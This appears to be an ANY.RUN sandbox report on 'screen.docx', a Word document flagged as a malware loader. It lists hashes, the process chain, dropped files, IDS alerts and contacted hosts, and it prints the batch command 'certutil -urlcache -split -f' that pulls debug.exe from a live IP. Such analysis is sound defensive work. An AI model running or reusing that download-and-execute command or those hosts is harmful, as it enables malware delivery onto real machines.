analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

screen.docx

Full analysis: https://app.any.run/tasks/25c9ce28-5fa3-414a-b02f-144cd37016f2
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 24, 2019, 15:13:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

C1C9BCBBBCCE2AE5116CE82AEC4A6DC8

SHA1:

BDB6CB5CE58C92FE2E8173BB28498B647D836E43

SHA256:

B4D4DFEB086872500891AA875EB221E8FC95E0C4566A07BC8ADDA5BD19AB76F3

SSDEEP:

384:aWUBe9VTAt9f+7DRk8Ek0563j8v55nT7az6GNw6muveW83CrIQOqreA:aEk9p8Ek0Mjin/oNwDuL83CrxOpA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • debug.exe (PID: 2464)
      • update.exe (PID: 1088)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2124)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2124)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 1012)
    • Changes the autorun value in the registry

      • debug.exe (PID: 2464)
    • Downloads executable files from the Internet

      • certutil.exe (PID: 2128)
    • Uses SVCHOST.EXE for hidden code execution

      • update.exe (PID: 1088)
    • Downloads executable files from IP

      • certutil.exe (PID: 2128)
  • SUSPICIOUS

    • Creates files in the program directory

      • debug.exe (PID: 2464)
    • Executable content was dropped or overwritten

      • debug.exe (PID: 2464)
      • certutil.exe (PID: 2128)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2124)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2124)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

XML

AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 108
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 93
Words: 16
Pages: 1
TotalEditTime: -
Template: Normal.dotm
ModifyDate: 2019:05:19 09:58:00Z
CreateDate: 2019:05:19 09:58:00Z
RevisionNumber: 2
LastModifiedBy: Dell_20170514745
Keywords: -

XMP

Description: -
Creator: Dell_20170514745
Subject: -
Title: -

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1460
ZipCompressedSize: 373
ZipCRC: 0x24886c04
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
6
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs certutil.exe debug.exe update.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2124"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\screen.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1012cmd /c ""C:\Users\admin\AppData\Local\Temp\info.bat" "C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1223
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2128certutil -urlcache -split -f http://137.59.18.154/debug.exe C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2464debug.exeC:\Users\admin\AppData\Local\Temp\debug.exe
cmd.exe
User:
admin
Company:
瑞创网络
Integrity Level:
MEDIUM
Description:
2345好压-在线升级程序
Exit code:
1223
Version:
3.1.1.9229
1088"C:\ProgramData\Update\update.exe" -PC:\ProgramData\Update\update.exedebug.exe
User:
admin
Company:
瑞创网络
Integrity Level:
MEDIUM
Description:
2345好压-在线升级程序
Exit code:
1223
Version:
3.1.1.9229
3132C:\Windows\system32\svchost.exe -OC:\Windows\system32\svchost.exe
update.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Host Process for Windows Services
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 542
Read events
865
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
1
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2124WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3FDB.tmp.cvr
MD5:
SHA256:
2464debug.exeC:\Users\admin\AppData\Local\Temp\CabA154.tmp
MD5:
SHA256:
2464debug.exeC:\Users\admin\AppData\Local\Temp\TarA155.tmp
MD5:
SHA256:
2464debug.exeC:\Users\admin\AppData\Local\Temp\CabA166.tmp
MD5:
SHA256:
2464debug.exeC:\Users\admin\AppData\Local\Temp\TarA167.tmp
MD5:
SHA256:
2464debug.exeC:\Users\admin\AppData\Local\Temp\CabA177.tmp
MD5:
SHA256:
2464debug.exeC:\Users\admin\AppData\Local\Temp\TarA178.tmp
MD5:
SHA256:
2128certutil.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\debug[1].exeexecutable
MD5:3A8D74BC002E1ACAE49A64F3F77AAC0B
SHA256:5AEE7AE5DD28FCD7E672912292061022C29538BF9264DB56B30EFDBC8D45ABC0
2464debug.exeC:\ProgramData\Update\update.exeexecutable
MD5:3A8D74BC002E1ACAE49A64F3F77AAC0B
SHA256:5AEE7AE5DD28FCD7E672912292061022C29538BF9264DB56B30EFDBC8D45ABC0
2128certutil.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\35B8349C30BFB90C73EE97DF035AF873executable
MD5:3A8D74BC002E1ACAE49A64F3F77AAC0B
SHA256:5AEE7AE5DD28FCD7E672912292061022C29538BF9264DB56B30EFDBC8D45ABC0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2128
certutil.exe
GET
200
137.59.18.154:80
http://137.59.18.154/debug.exe
HK
executable
140 Kb
suspicious
2128
certutil.exe
GET
200
137.59.18.154:80
http://137.59.18.154/debug.exe
HK
executable
140 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2128
certutil.exe
137.59.18.154:80
Xima Network
HK
suspicious
3132
svchost.exe
103.64.12.106:53
www.kkxx888666.com
TOPWAY GLOBAL LIMITED
HK
unknown

DNS requests

Domain
IP
Reputation
www.kkxx888666.com
  • 103.64.12.106
malicious

Threats

PID
Process
Class
Message
2128
certutil.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2128
certutil.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2128
certutil.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2128
certutil.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
2128
certutil.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2128
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
2128
certutil.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2128
certutil.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2128
certutil.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
2 ETPRO signatures available at the full report
No debug info